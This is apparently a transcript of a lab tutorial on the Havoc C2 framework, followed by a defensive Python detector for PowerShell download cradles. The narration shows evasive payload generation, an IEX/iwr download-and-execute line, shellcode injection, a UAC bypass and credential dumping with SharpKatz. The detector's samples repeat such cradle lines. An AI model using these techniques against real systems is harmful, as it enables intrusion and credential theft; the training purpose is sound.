Red Teaming With Havoc C2

Captions
Hello everyone and welcome back to the Cyber Ranges YouTube channel. In this video we're going to be continuing our C2 framework playlist or series, where we'll essentially be taking a look at how to utilize the Havoc C2 framework for red teaming operations.

Before we get started, as you already know there are a couple of videos within this series, so if you're new to the series make sure to take a look at our C2 framework series here on YouTube. That will essentially introduce you to C2 frameworks, explain how they work, and give you examples of some of the other C2 frameworks we've taken a look at. On another note, we will be running a C2 Frameworks boot camp on the 25th of October 2023. If you want to register for that boot camp to learn more about C2 frameworks, please take a look at the link in the description for more details on how to get access. With that being said, let's get started.

So Havoc C2, or the Havoc C2 framework, is a relatively new C2 framework when you compare it to some of the other options available, especially the open-source options. You might be asking yourself, if you haven't heard of Havoc, what exactly is Havoc apart from the fact that it is a C2 framework? Well, to dive a little bit deeper, Havoc is a modern and malleable post-exploitation command and control framework created by 5pider (or C5pider, depending on how you want to call it). It's important to note that Havoc is still in an early state of release or development, and what that means is that changes and updates made to the framework may change how the framework works or may break functionality. The reason this is important, going back to some of the previous videos within this series, is primarily because when you are choosing a C2 framework, one of the parameters that you should have, or that you might have, is that it remains relatively stable, or remains relatively the same in terms of functionality, over a period of time so as to ensure continuity for your red team operations.

With that being said, you can actually find out or learn more about the framework and the development roadmap on the GitHub repository, and it's also recommended to refer to the official wiki for more information on functionality and the components that make up the framework; they have a lot of info on there. In this case we'll be utilizing a lab on Cyber Ranges. The lab will be part of the C2 Frameworks playlist that you can subscribe to; you can get access to this playlist of labs through our upcoming C2 Frameworks boot camp, but I'll be walking you through that process shortly.

To dive a little bit deeper into the release history, as I pointed out, Havoc is still in active development and as a result it has not yet been adopted by adversaries for long-term engagements. So far Havoc has only had two major releases: we have 0.1, code named Star Platinum, that was the first public release of Havoc, and we have 0.2, code named Magician's Red, which is the second public release of Havoc. Given the project's development cycle and roadmap, it is very important to consider your own C2 requirements and how they can play into the overall stability of Havoc at this point in time.

Given the relative newness of Havoc, many AV solutions like Windows Defender have not been able to detect the vanilla payloads or stagers. Of course this may change depending on when you watch this video, but this is very common for new C2 frameworks that develop or compile new implants or agents: if they are utilizing new techniques, or techniques in different ways in terms of generating the payloads, those payloads will in most cases evade detection until the actual antivirus solutions or EDRs update their signature database. In late October 2022 a lot of AV and EDR solutions began developing signatures to detect the Havoc payloads, but they can
still be utilized in a plethora of other ways, like for example injecting the payloads into an executable, and so on and so forth in terms of the options you have for payload generation. We'll actually take a look at that, but before we do, installing and building Havoc can be quite cumbersome or complicated at this point in time, but it does work well on Debian 10 and 11, Ubuntu 20.04 and 22.04, and Python 3.10 upwards, to avoid build issues. To alleviate some of these issues, what we have done on Cyber Ranges is build a lab that already has Havoc installed and configured, so you don't have to go through that process and can essentially dive into it.

Another thing to note is that Havoc is not yet a part of any official repository of penetration testing distributions like Kali or Parrot, so you can't install it directly via a package within one of the repos. The Havoc project is also actively working on a functional Docker image that will simplify the setup and build of the various components that make up the framework, so in time we will see a Docker image available that can again speed up the setup process.

Now in terms of its features, given the fact that the framework is relatively new, the features are limited, but I would argue that they are very, very useful in the context of Windows red teaming. Firstly, in terms of payload generation you're limited to EXE, shellcode and DLLs, which is perfectly fine in the case of Windows. You also have HTTP and HTTPS listeners, you have customizable C2 frameworks and external C2 framework support. One really cool feature you have is sleep obfuscation via Ekko and Foliage, which I'll touch on. You also have x64 return address spoofing, indirect syscalls for Windows NT APIs, SMB support for more peer-to-peer style C2 frameworks or architecture, you also have a token vault and a variety of built-in post-exploitation commands, as well as the ability to execute PowerShell in memory, which is actually fantastic, and the same goes for shellcode. So we'll take a look at all of this.

In my opinion the user interface of Havoc, or the Havoc client, is very similar to that of something like Cobalt Strike, which I personally like, so this is a great framework to actually try out if you are looking for something along those lines in the context of Windows red teaming.

Now for some important terminology, because as you know every C2 framework has its own unique terminology, which again is nothing new, but it's very important that you understand what these terms mean. Generally speaking, globally speaking, the listener is a fairly well-known piece of terminology in the context of C2 frameworks: it essentially refers to the local process listening for a connection or beacon from a compromised host. We then have the term team server; the team server refers to the actual Havoc C2 server. Then you have the Havoc client, and the client is what you utilize to interact and communicate with a team server. What this means is that Havoc also has multi-user support, which means if you are part of a large red team you can all utilize the client to connect to a centralized server and then execute operations that way. You also have modules; modules are a piece of code executed by the agent to achieve a specific goal. You also have the demon; this is very important. The demon is the primary Havoc agent and it's written in C and ASM. You also have the demon payload, and currently at this point in time, as I've already gone over, the only supported demon payloads are x64 EXEs, DLLs, as well as shellcode, so it's really a Windows C2 framework at this point in time. Functionality may be extended, and that's why it's very important that you actually try it out before adopting it for a red team engagement.

As for the listener types, you have your standard HTTP and HTTPS listeners, so they are
used to issue tasks through GET requests and can receive data back with POST requests. You also have an SMB listener, which is used to create peer-to-peer C2 communication channels that utilize named pipes to communicate through a parent agent. You also have external C2 listeners, so they support custom agents and external C2 by utilizing the team server service endpoints.

In terms of the modules, you might be thinking to yourself, well, how extensible is this C2 framework? Well, at this point in time Havoc has a couple of officially supported and integrated modules, one of which is PowerPick, which executes unmanaged PowerShell commands by loading the CLR runtime into the designated fork-and-run process, which is very useful. You also have InvokeAssembly, which will execute a .NET assembly in a separate process by bootstrapping the CLR into the designated fork-and-run process and passing the arguments. You can learn more about these supported payloads on their GitHub repository. In the context of Windows red teaming you're really going to be working with PowerShell, which Havoc has fantastic support for, so I'm really excited to get started.

So now that we can actually get started with the demo, I'm going to switch over to the Cyber Ranges platform and we can take a look at how to utilize the Havoc C2 framework for red team operations. Let me switch over into my browser real quick.

All right, so I am back within my browser and I'm currently on the Cyber Ranges platform. To access the lab there are two ways you can go about doing it: you can either buy a subscription to the lab or to the playlist of labs titled C2 Frameworks, or alternatively an easy way to get started with it at a relatively cheap price is the upcoming C2 Frameworks boot camp scheduled for the 25th of October. Again, the link to that event is in the description section. But to get started, if you're new to Cyber Ranges, you can essentially navigate to the URL app.cyberranges.com where you'll be prompted to create an account. If you have an account that's great; if not, registering for one is easy and free. You can click on Register right over here, and you'll then need to provide a unique username and a functional or valid email, because you will receive an activation email that will ask you to confirm your account and consequently specify your password. Once you provide a valid email and confirm it, you can go through the terms and conditions and agree to them if you do agree with the terms and conditions, and then register. You don't need to put in a promo code at all here; that's not required. Once you've registered you'll receive that activation email that will provide you with a link through which you can specify the password for your account, and you should be good to go.

I already have an account, so I'm just going to log in here, and you'll see that once you're logged in you'll be taken or directed directly to the Cyber Ranges dashboard, where you can essentially view the latest scenarios or labs. In the context of the Cyber Ranges platform, scenarios are individual labs and playlists are collections of labs, so you can go through the playlists and scenarios available on Cyber Ranges. Currently the Community section is where you can find free labs, so we have a great selection of free labs that you can get started with at no cost; they essentially come pre-bundled with your account as free, so you have unlimited access to them. We have a MITRE ATT&CK Defend Adversary Emulation Fundamentals playlist, which contains seven labs, really cool stuff. You also have a collection of 72 boot-to-root scenarios, so these are CTF challenges that you can go through. You also have a collection of vulnerable web applications as well as CVE labs; we have some really cool vulnerabilities in here like Log4Shell, Dirty Pipe and the
latest vulnerability on Linux, CVE-2023-22809, which is the sudoedit privilege escalation lab.

Now to get access to the C2 Frameworks playlist of labs, you can navigate into Playlists and just search for C2 and it should pop up here. You can get access to this playlist at $150 per month, which will provide you with access to labs on a range of C2 frameworks like Empire, Covenant, Havoc, Sliver and dnscat, as well as Mythic, as well as a range of other ones like Nimbo-C2, AtlasC2 and PoshC2. As I said earlier, if you want to access these labs for a month in addition to the boot camp, please take a look at the link in the description.

In my case I already have the Havoc lab started up, and the link to the playlist will be in the description section as well. I'll just go into Havoc here, and this is what a lab looks like on Cyber Ranges. The lab page is very easy to understand: you have an overview that will provide you with a walkthrough of the lab and the systems that you can access within the lab. Cyber Ranges labs provide you with access to a Kali Linux system, so you'll have access to that; in addition to that you can also connect to the lab network using a VPN if you want to utilize your own pentesting distro, and you have details on the target system as well as credentials that you can utilize there. So the overview provides you with a walkthrough. You also have questions that'll assess your knowledge and abilities with regards to the Havoc C2 framework, so this is very important, and they're sorted based on configuration as well as the red team operation side of things. You then have the Services page, where you'll essentially be provided with a list of systems you can access as part of the lab. As I said, you have access to the Kali Linux system; you can just click on Remote Desktop and it'll open up a session within a new browser tab that you can see here. So,

because we have two systems via Apache Guacamole, I'll just click on Kali and you'll have near-native performance with the Kali Linux system directly in your browser. How cool is that? So there we are, we can see we're on the Kali Linux system and we can now get started with Havoc. You can go through the video demo that I'll be walking you through, or you can go through the scenario mission or walkthrough if you find that works better.

All right, so to get started with Havoc, as I said, the lab already has Havoc built and configured, so we don't need to go through that phase. Just open up a terminal here; I'm just going to increase the font size so you can see what I'm doing. We want to navigate into the /opt folder, so let me do that right now, and we then have the Havoc folder in here, so we're going to go into Havoc. From this point on let me explain how Havoc is sorted in terms of the file structure. You can see we have a couple of folders; most importantly we have the client folder and the teamserver folder, and we also have a couple of other important ones. To begin with, what I want to explore is the profiles folder within the teamserver folder, so I'm going to navigate into teamserver right over here, and within the teamserver we're going to have a couple of binaries, or pretty much one binary. We have the teamserver binary, which you can execute using sudo ./teamserver, and you can then bring up the help menu to get some information about how to utilize or how to start up the team server; I'll be walking you through this. The reason this is important is because the team server requires a profile, a C2 profile, to be specified. If we navigate into the profiles folder you can see that we're going to have two profiles: we're going to have the Havoc yaotl profile (they're in a yaotl format) and the HTTP/SMB profile, which is the one that's been set up, so
this will set up HTTP and SMB listeners for you. These ones are there by default, so if I cat out the contents you can see it pretty much defines parameters around the functionality of the C2 server or the team server. You can see that the host is set to the actual IP of the Kali system and the port it listens on is 40056. The compiler is the standard one, so the x64 compiler as well as the nasm compiler for generation of payloads, and then the operator credentials or profiles are listed in here. Let me just expand that again, there we go, and you can see that the users you can utilize are 5pider and Neo, and the passwords are displayed here. You also have information about the listeners: the HTTP listener has been configured to bind to the IP address of the Kali system, so we don't need to modify anything there; you can also take a look at the user agent for that. You then have the actual SMB listener here, which is just called pivot SMB, and the pipe name for SMB is demon pipe. For the injection you can see the default parameters are specified here for spawn64 and spawn32, and the default sleep option has been configured to 2 seconds. So you can modify the profiles to affect how Havoc will work.

In terms of utilizing it or starting up the actual Havoc C2 or team server, it really is very, very simple. What we need to do at this point is just say sudo ./teamserver, so we run the teamserver binary, and then we specify the option server, and then we need to specify the profile with --profile. The profile in this case is under the profiles folder as I showed you, and the name is just http_smb.yaotl. We hit enter, and that's going to take a couple of seconds. You can see Havoc Framework version 0.2 Magician's Red, the profile being used is http_smb.yaotl, the build options, everything that we saw in the profile, and then it's going to start the listeners.

From this point on we can now utilize the Havoc GUI client to interact with the team server. I'm going to open up a new tab here and we'll just navigate to the same folder, so I'll just zoom in once more and we'll cd into /opt and Havoc right over here, and in here we want to go into the client like so. Within the client we have the havoc client binary, so to run it or to get started we just say ./havoc, or execute the binary, and from this point on it's going to bring up the GUI connection prompt. What we want to do is click on New Profile, and the name for the profile will be set up; it's going to connect to localhost, which is fine, that's where we have the team server running. Make sure you leave the team server tab open within your terminal, because that is required. From this point on, if you remember the credentials for the user 5pider, those are going to be password1234, and you can then connect, and that's going to bring up the Havoc C2 GUI client, which is absolutely fantastic and reminiscent of Cobalt Strike.

So now I'm going to walk you through the user interface, and then we can take a look at an example of how you would utilize Havoc C2 for a Windows red team operation, or a red team operation that's targeting Windows environments. To kick things off, at the top you're going to have a toolbar that's very important. If you click on Havoc you have the ability to create a new client session, disconnect from the current session, or exit. Under View you'll be able to view your current listeners, so if I click on Listeners you can see we have the two listeners configured in the yaotl profile. You can see we have the HTTP/HTTPS listener, where you can pretty much remove it, add a new one or edit it. If we click on Edit you can see the agent listener; it's called Agent Listener HTTP
or HTTPS, and the payload is HTTP. It's currently configured to bind to the IP address of the Kali Linux system and the port it connects to is 443. You can play around with the user agent, as I know that's usually useful, as well as the headers, so obviously try and get rid of the X-Havoc headers right over here, or modify them, so that if your traffic is being monitored or analyzed it doesn't look too obvious. You can also configure a proxy connection if that works for you. But that's how to view your listeners as well as remove them, edit them or add a new one. If we take a look at the SMB listener, very, very simple: you just provide the pipe name right over here. That's very useful for Windows environments, especially when you want to set up a peer-to-peer based C2 connection architecture or style.

So now that we've taken a look at listeners, on the View menu you can also change the session view from a table to a graph, which is really cool; I'll actually get to that. Part of the multi-user support provides you with access to a team server chat where you can communicate with your other red team operators, so for example my username is 5pider here and I can say hello, and if we had other clients they would be able to communicate with me. I really like this feature because it's integrated into the client, and multi-user support is always fantastic. You can also close active tabs at the bottom here. The panes are sorted to essentially by default provide you with an event viewer as well as a list of agents. The agents table shows you the ID, the internal IP, the username, the computer, the operating system, the process, the process ID, the architecture of the process and when the agent essentially last connected back or last sent a beacon back. On View I can also take a look at Loot, so that's information that's exfiltrated from a host or a target, as well as the Event Viewer and the Teamserver, and you can see the team server just shows you the current state of the Havoc C2 server, where you can essentially use this to diagnose any potential issues on that front. Under Attack you have the ability to generate a payload, which we'll get into, and then you have Scripts, where you can take a look at the script console as well as the script manager right over here, where you can load scripts, most likely PowerShell scripts of course, and then Help provides you with documentation, the API reference, as well as a link to the GitHub repo.

So now that we have an understanding of the overall UI, let's get started with an example as to how we can use Havoc for a red team operation. All right, so in order to gain access, what we're going to be trying to do is generate a payload, or a demon if you will, and then transfer it over to our target Windows system. We're not going to be utilizing any real red team tactics or techniques for initial access; we'll just be transferring the payload with a web server, switching over to the Windows machine, downloading it and then executing it. To generate the payload we want to click on Attack and Payload. The agent is just Demon, and the listener we want to bind it to is the HTTP listener that we have configured. Architecture: it only supports x64 at this point in time. And then the formats: this is where you have the EXE format, the DLL format, shellcode, etc.; we'll also take a look at shellcode later on. You can then configure the sleep timer here, as well as disable or enable indirect syscalls, which is great for defense evasion. So with this, the agents come with inbuilt defense evasion tactics or techniques, like the ability to utilize indirect syscalls to avoid calling functions from kernel32.dll and ntdll.dll. It also has the ability to utilize two techniques for encrypting the memory region of the process that it's running in, to avoid memory scanners when the agent is in sleep mode. So an
example of this right over here: if I go into the sleep technique, we have Foliage and Ekko. If you're not familiar with Foliage and Ekko, they're essentially techniques that allow you to encrypt the memory region of the process, essentially making it hard for an EDR, for example, to actually mark it as suspicious. We'll go with Ekko in this case, which is very effective, and then the injection technique Native/Syscall; you can also opt for Win32. Once you're ready to go you can just click on Generate and it's going to compile the Windows EXE payload for you, and in this case the agent is just Demon. As you can see, compiling source; I'm going to give it a few seconds to maybe a minute to finalize.

All right, so once it's done it's going to prompt you to provide a location as to where you want it saved. I'm going to save it in my Downloads folder; that'll become apparent, because there are a couple of scripts we have here, some PowerShell scripts as well as Seatbelt and SharpKatz, that we'll be using for this demo. So I'll save it in there as demon.exe.

Now that we have that generated, we now need to transfer it over to the Windows system. In order to do this, I'm going to set up a web server here using Python on the Kali Linux system to host that file, and all those files within the Downloads folder. I'll navigate into Downloads, and in here we'll just say sudo python3 -m http.server, and we'll run it on port 8080, and it'll host all of these files that we'll require.

Now I'll switch back over to the lab page, and under the Windows 10 system, which is the target system, we can also get RDP access to that system within our browser. So within Guacamole we'll just click on Windows 10 and you should be signed in. This system is running Windows 10, which is great for this demo, and now I'll just download the demon payload that we generated. I'll just utilize PowerShell; actually let me increase the font size here so you can see this, so on the font just increase this to something like 28. I'll navigate to the Desktop, and from this point on I can utilize something like Invoke-WebRequest and then say the URI is going to be the IP address of the Kali Linux system, which is going to be static, so in this case it's 192.168.125.55, and then the port is port 8080 (and Windows is bugging us with updates as usual). So 8080, and then the name is demon.exe as we saved it, and then the out file is going to be demon.exe, and we can then hit enter and it's going to save it on the Desktop. From this point on we can pretty much execute it, so I'm just going to say demon.exe from within PowerShell.

If we switch back over into the Kali Linux system and into the Havoc client, we should see the callback from the actual agent in a few seconds, depending on the sleep timer. There we are, we can actually see it. In this pane you're going to see the actual agents being displayed. You can change the view to a graph, which is more reminiscent of Cobalt Strike, where you can essentially view the C2 server, represented by this icon, and all of the agents or hosts calling back. I'll go back into the table view, where you can see the ID of the agent, its internal IP, the user we currently have access to, the computer name or the hostname, the operating system, as well as the process, the process ID, the architecture and when it was last seen. If the sleep timer is set to 2 seconds, it'll ping back every 2 seconds; obviously that's something you can modify.

To interact with it you can right-click on it and you have a couple of options: you can export it, mark it as dead, remove it, or terminate the connection through the thread or process option there. Under Interact, that'll bring up an interactive shell session, which will open up in the bottom pane right over here, so I'll just drag this in here. There are a couple of things that you need to be aware of. Firstly, Havoc provides you with a really cool set of inbuilt modules or commands that you can invoke, and you can learn more about them by typing in help. You can see that we have a couple of demon commands like sleep, checkin, job, task, dir, your standard file system navigation tools, as well as a powershell option. So for example I can run the inbuilt command whoami, like so, and that's going to display additional information; that's not the native Windows command. If I wanted to run a shell command on the Windows system I can just say shell whoami, and that'll run the actual whoami command, and you can see it's going
to task the demon to execute the shell command, and the output will be displayed here. You can see that's what you would expect from the native Windows command. You can also learn more about an inbuilt command by typing in help and then the name of the command, like whoami, and you can see it's going to say the usage is fairly simple: this is going to get all the info from whoami without starting cmd.exe. So that's one of the great things about Havoc: defense evasion is built into it in terms of the command options that you get natively. A very useful command is obviously the checkin command here, so if I just type in checkin, this will allow us to view... it's going to send a check-in request. There we are, check-in request, and we get information about the agent: the agent ID, the first call-in in terms of the timestamp, as well as the cryptographic key, so the AES key, and then the sleep delay, and just information about the agent.

We can also right-click on an agent here and explore the process list or the file explorer. If we go into the process list, it's going to open up a new tab, and look at how fantastic this is: we have essentially a complete list of the process tree starting from process ID zero, and so on and so forth. We can take a look at processes and interact with them by right-clicking on them and copying the process ID; we can also refresh the process tree right over here. As I said, you also have the ability to utilize the file explorer module, which, as it says, will allow you to browse the file system on the actual agent or the target host. So File Explorer, in here you can see we're currently within the Desktop, but we can specify a path, for example C:\Users in here, and I'll hit enter and that's going to bring up that directory. We can then navigate by going into, let's say, admin, and in this particular case if we hit enter I don't think that'll work directly, but we can say C:\ in here and we can just say Users and admin, like so. If that doesn't work you can specify the native path here as you would within Windows, and make sure to specify the correct folder or file names. If I hit enter now, that'll bring up the admin user directory and we can then navigate. If you want to exfiltrate a file you can right-click on it; you can also create a folder, reload or remove a file. For example, if we actually go into C:\, let me type that in correctly, so Users and then admin in here, and I go into the Desktop, you'll see it'll bring up the Desktop, and from this point on we have the ability to exfiltrate and download through the shell session, which I'll touch on, but you can also remove it, create a directory or reload the file system. So really, really cool stuff here.

What we can do is, if we go into the shell session, we can actually try and for example take a screenshot of the desktop, and the reason why I'm showing you this is because right over here you can view what you have exfiltrated by going into View and clicking on Loot, and here you'll see the screenshot that we just took, which is exactly how we left it on the Windows system with the PowerShell session still running, which is pretty cool. You can also filter by the type of information or data exfiltrated, so screenshots or downloads, and that's a really, really cool tip or something that I find really useful.

So now let's take a look at some typical things you do after exploitation or initial access with Havoc. An example of something that we can do is of course run the Windows systeminfo command through shell to learn more about the target, so just standard local enumeration, and the output will be displayed within this window. Here we can learn more about the target operating system; we can also perform
enumeration about the user so for example uh in here we can say you know shell net user and uh we can just say for example to learn more about the admin user we can say shell net user admin and um we'll give that a few seconds it's going to send the task and there we are so we now know that this user is uh part of the administrators the uh the local administrators group on windows so that means if I say shell who am I and I say priv here let's see whether we have elevated privileges or whether we'll need to you know bypass um UAC so in this case we can see that while the admin user is part of the local administrators group um we currently don't have a privilege session so let's take a look at that as an example as to how we can Elevate our privileges so one thing that we can do is if we go back to the process tree and I want to show you some Shell Code generation and injection um we can actually um we can actually try and inject Shell Code into a process right so in order to do that what we want to do is is uh let's go ahead and uh we're going to go into attack payload and we're going to generate Shell Code so Windows Shell Code and in here we'll again select the Sleep technique as Echo and we're going to say generate and that's going to generate Shell Code in the form of a uh binary file or bin file if you will not binary but bin and um we'll give it a couple of seconds is then going to prompt you to specify a location as to where you want to save the bin file so it's going to to compile everything and that'll take a couple of seconds which we will uh you know happily give and I'm going to save it under the downloads directory so just as demon. 
bin and now that it's done we can actually go into the process tree and for example uh we had created a partial process here let me see if I can identify it so uh we'll just try and find it uh somewhere here let's see hm uh can we find powershell.exe anywhere here all right so there we are we have power shell and now I can copy the process ID and if I wanted to inject that Shell Code to give us another session again just showing you how this can be useful you can generate whatever Shell Code you want and then inject it into a process dynamically we can essentially go back into the shell here and say uh shell code um so I'm just going to type that in so Shell Code inject and we can then say X6 4 because it is x64 Shell Code and then the process ID which we copied so I'll paste that in there which is 6328 of the power shell process or any process for that matter and then the directory to the Shell Code so home range admin is the name of the user on the Cali Linux system under downloads We have demon uh dobin all right so I'll hit enter and that's going to execute the Shell Code into the remote process and we should get another check-in from the same Target system now as I said you can inject whatever Shell Code you want that does whatever you want this just shows how this will work so you can see that the injection the U the Shell Code was injected successfully and indeed we get another call back from the same system but now through the poell process how cool is that now if we wanted to elevate our privileges if you remember we had set up a web Ser in the downloads directory that contained a bypass UAC partial script we can actually try and I'll show you how execute power shell scripts with Havoc here so it really is very very simple so we firstly need to get the agent to download it from our web server uh the actual script so we'll say Powershell and you can execute Powershell commands natively uh this way so we can say Powell IEX iwr and then we can say usab um and 
then HTTP the IP address of the cinic system where the web server is running uh 55 and then we can say port 8080 and the name of the file is going to be as we know bypass uh UAC and uh it is bypass u. PS1 so Powershell and then um we can just close the brackets and hit enter so this will tell the agent uh to essentially download the script and then execute it and we should get a call back based on what the script does which I'll actually show you so this is a modified um bypass UAC script that we develop to essentially bypass uh UAC and then connect back to our listener here so in this particular case it will bypass UAC and then execute the demon. exe payload that we transferred onto the Windows system which is why I saved it on the desktop so you can modify this script to execute whatever executable you want or payload that you want even a meterpreter payload uh as long as you specify the path uh where it is saved and you ensure that that payload is already been transferred so uh not really an intri intricate script by any means but uh we can just hit enter here and it's going to send the task to the agent and uh there we are we received an output and uh we should get a call back if everything was successful if not we'll take a look at the command to see whether we had any errors but we should get an elevated or a privileged call back which indeed we do so the best way to visualize this is to go into view and then into the graph View and in here now let me just drag this pan to the bottom and you can now see that we have two uh standard non-privileged sessions on the actual system or the host these two here running on different processes and then we have a privilege session so it has a similar iconography to that of cobalt strike where the elevated session will'll have an icon that's highlighted in red that's surrounded by electricity or uh something like that and uh in this case we now have an elevated session so we can now right click on it and interact with it 
and if I now say you know for example who am I uh we can just say shell because we want to run who am I uh priv we should now have elevated uh an elevated session so we'll wait for the results and as you can see here we have all the Privileges you would associate with an elevated session now the final technique that I want to show you is how we can um essentially execute uh inline um how we can utilize the net command and perform inline execution to run an executable right so in this case we'll be running sharp cats which is under the desktop of the Cali Linux system so we can utilize something called net and then inline um execute to execute the executable in line or in memory and we specify the path to that executable so in this case it's down uh home range admin downloads and the name is shop cat.exe so this executable already ex is already present in the downloads folder and will just allow us to dump credentials proving that we elevated our uh privileges so we can now say log on passwords um so we'll just say log on password so this is a modified version of mimicat we'll just hit enter and if everything is successful um let's see looks like we have a bit of an issue so net inline execute home R range admin downloads sharp cat.exe uh log on passwords um let's see do we have any error here so uh we have it on the downloads and it's just shop cat.exe um uh let's see here I think I made a spelling mistake with net that is my badge so that's not doet but rather net there we are and that should execute that exe in line or in memory so there we are we can see that Shop cats execute successfully and we should be able to get some hashes here so we'll give it a couple of seconds and uh the results will will be displayed back we actually get the ntlm hash of the admin user which you can then try and crack although the clear text password is already displayed here on the lab page so that is uh that brings us to the end of the Practical uh session of this video and to the 
end of the video as a whole and that is how to utilize Havoc uh C2 framework for red team operations so definitely give it a go uh and with that being said thank you very much for watching this video If you enjoyed this video please leave a like down below and subscribe to the Cyber Rangers Youtube channel for more uh if you found this video useful please share it on uh your social networks on LinkedIn and Twitter that'll help us a lot if you want to gain access to this lab and other C2 framework Labs uh please take a look at our upcoming boot camp it's a 3-day boot camp uh in on starting on the 25th of October that will provide you with access to the actual training and the C2 Frameworks playlist on Cyber Rangers for days are all at an incredibly uh cheap price so definitely check that out the link to that is in the description section with that being said thank you very much for watching and I'll be seeing you in the next video
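From the defender's side, the most visible artefact of the script-execution step in the video is the download-and-execute cradle (IEX wrapped around iwr with -UseBasicParsing pointing at a .ps1 on a bare IP and port). The following is an added example, not code from the video, from CYBER RANGES or from Havoc: a small Python checker that scans PowerShell script-block text (the ScriptBlockText field of Event ID 4104) and flags blocks where a web download feeds Invoke-Expression. The sample blocks, the 192.0.2.55 address and the scoring reasons are my own construction.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample script-block entries (not real telemetry), written the way
# they would appear in the ScriptBlockText field of PowerShell Event ID 4104.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX(iwr -UseBasicParsing http://192.0.2.55:8080/bypassuac.ps1)",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.0.2.55/a.ps1')",
    "Get-ChildItem C:\\Users\\admin\\Desktop | Format-Table",
    "iwr https://www.powershellgallery.com/api/v2 -OutFile .\\index.html",
    "iex ((new-object net.webclient).downloadstring('http://192.0.2.55:8080/x'))",
]

# A cradle pairs an execution primitive with a download primitive in one block.
EXEC_PRIMITIVES = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD_PRIMITIVES = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b",
    re.IGNORECASE,
)
# Stop the URL at whitespace, a closing paren or a quote so 'http://x/a.ps1)' is captured cleanly.
URL = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s)'\"]*)?", re.IGNORECASE)

@dataclass
class CradleHit:
    script_block: str
    url: str | None
    reasons: list[str]

def detect_download_cradle(script_block: str) -> CradleHit | None:
    """Return a hit when a web download feeds Invoke-Expression, else None."""
    if not EXEC_PRIMITIVES.search(script_block) or not DOWNLOAD_PRIMITIVES.search(script_block):
        return None
    reasons = ["IEX combined with a download primitive in one script block"]
    m = URL.search(script_block)
    url = m.group(0) if m else None
    if url and re.search(r"://\d{1,3}(?:\.\d{1,3}){3}", url):
        reasons.append("download target is a bare IP address rather than a hostname")
    if url and re.search(r"\.ps1\b", url, re.IGNORECASE):
        reasons.append("remote resource is a .ps1 script")
    if "-usebasicparsing" in script_block.lower():
        reasons.append("-UseBasicParsing set, typical of non-interactive cradles")
    return CradleHit(script_block, url, reasons)

def scan(blocks: list[str]) -> list[CradleHit]:
    """Run the detector over every block and keep only the hits."""
    return [hit for hit in map(detect_download_cradle, blocks) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_SCRIPT_BLOCKS):
        print(hit.url, "|", "; ".join(hit.reasons))
```

Script block logging must be enabled on the endpoint for 4104 events to exist at all; the same pairing logic applies to command-line telemetry (Sysmon Event ID 1 or 4688) when the cradle is passed as an argument to powershell.exe.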
Info
Channel: CYBER RANGES
Views: 10,581
Keywords: cyber security, cybersecurity, cyber range, cyber ranges, cyberranges, havoc c2, havoc, havoc c2 framework, havoc c2 framework overview, c2 frameworks github, best c2 frameworks 2023, best c2 frameworks, programming, mythic c2 framework, c2 framework revealed, introduction to c2, introduction to C2 frameworks, penetration testing, c2, command and control, c2 framework functionality, red teaming cyber security, red teaming course, red teaming vs pentesting, red team, pentesting
Id: WGJbI_Hug_I
Length: 43min 18sec (2598 seconds)
Published: Wed Oct 11 2023